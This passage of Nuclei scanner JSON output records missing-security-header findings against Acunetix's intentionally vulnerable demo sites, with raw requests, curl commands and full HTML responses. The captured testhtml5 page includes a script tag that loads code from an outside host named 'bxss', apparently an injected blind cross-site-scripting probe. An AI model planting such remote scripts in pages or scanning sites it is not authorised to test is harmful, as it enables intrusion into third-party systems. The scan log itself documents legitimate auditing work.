\\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:12.634201856Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:13.197157026Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:13.197135322Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" 